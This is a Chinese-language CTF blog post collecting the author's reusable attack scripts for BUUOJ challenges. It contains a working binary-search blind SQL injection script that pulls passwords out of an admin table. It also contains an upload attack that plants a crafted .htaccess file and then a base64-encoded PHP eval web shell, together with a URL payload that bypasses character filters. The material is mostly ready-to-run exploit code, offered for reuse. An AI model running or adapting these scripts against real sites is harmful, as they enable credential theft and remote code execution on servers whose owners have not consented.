常用脚本

记录一下常用的一些脚本

SQL 二分盲注

import requests
from time import sleep

url = "http://8fd845b8-4242-4441-ab34-57c8386d5faf.node3.buuoj.cn/backend/content_detail.php"
proxies = {
"http": "127.0.0.1:8080"
}
def attack(cur, mid=""):
# payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,0)" % (cur, mid)
# payload = " or length((select group_concat(password) from users))={}#".format(cur)
# 一开始把#写成%23, 结果一直不对, 后面才想起python会自动编码...
# payload = " or if(ascii(substr((select group_concat(password) from users),%d,1))>%d,1,0)#" % (cur, mid)
# payload = "0^(ascii(substr(((select(group_concat(column_name))from(information_schema.columns)where(table_schema=database()))),%d,1))>%d)" % (cur, mid)
payload = "0^(ascii(substr((select(group_concat(password))from(admin)),%d,1))>%d)" % (cur, mid)
data = {
"id": payload
}
res = requests.get(url, params=data, proxies=proxies)
# print(res.text)
if res.status_code == 429:
print('too fast')
if "content" in res.text:
return True
else:
return False


def try_length():
for i in range(1, 10):
if attack(i):
print(i)
break
sleep(0.02)

def main():
flag = ""
for i in range(1, 22):
end = 127
start = 31
mid = (end + start) // 2
while end > start:
if attack(i, mid):
start = mid + 1
else:
end = mid
mid = (end + start) // 2
sleep(0.02)
flag += chr(mid)
print(flag)

if __name__ == "__main__":
# try_length()
main()

SSTI 判断图

.htaccess 上传 getshell

import requests
import base64

url = r"http://2eab5f94-4cfd-41dc-ac5d-6cda977d7ce4.node3.buuoj.cn//?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"

# SIZE_HEADER = b"#define width 1\n#define height 1\n\n"
SIZE_HEADER = b"\x00\x00\x8a\x39\x8a\x39"
htaccess = SIZE_HEADER + b"""
AddType application/x-httpd-php .cc
php_value auto_prepend_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_2c67ca1eaeadbdc1868d67003072b481/shell.cc"

"""
files = [
("file",(".htaccess", htaccess, "image/gif"))
]
proxy = {"http": "127.0.0.1:8080"}
res = requests.post(url, files=files, proxies=proxy).text
print(res)

shell = SIZE_HEADER + b"00" + base64.b64encode(b"<?php eval($_GET['cjm00n']);?>")
files = [
("file",("shell.cc", shell, "image/gif"))
]
proxy = {"http": "127.0.0.1:8080"}
res = requests.post(url, files=files, proxies=proxy).text
print(res)


作者: cjm00n
地址: https://cjm00n.top/CTF/useful-scripts.html
版权声明: 除特别说明外,所有文章均采用 CC BY 4.0 许可协议,转载请先取得同意。

BuuOJ刷题记录3 BuuOJ刷题记录2

评论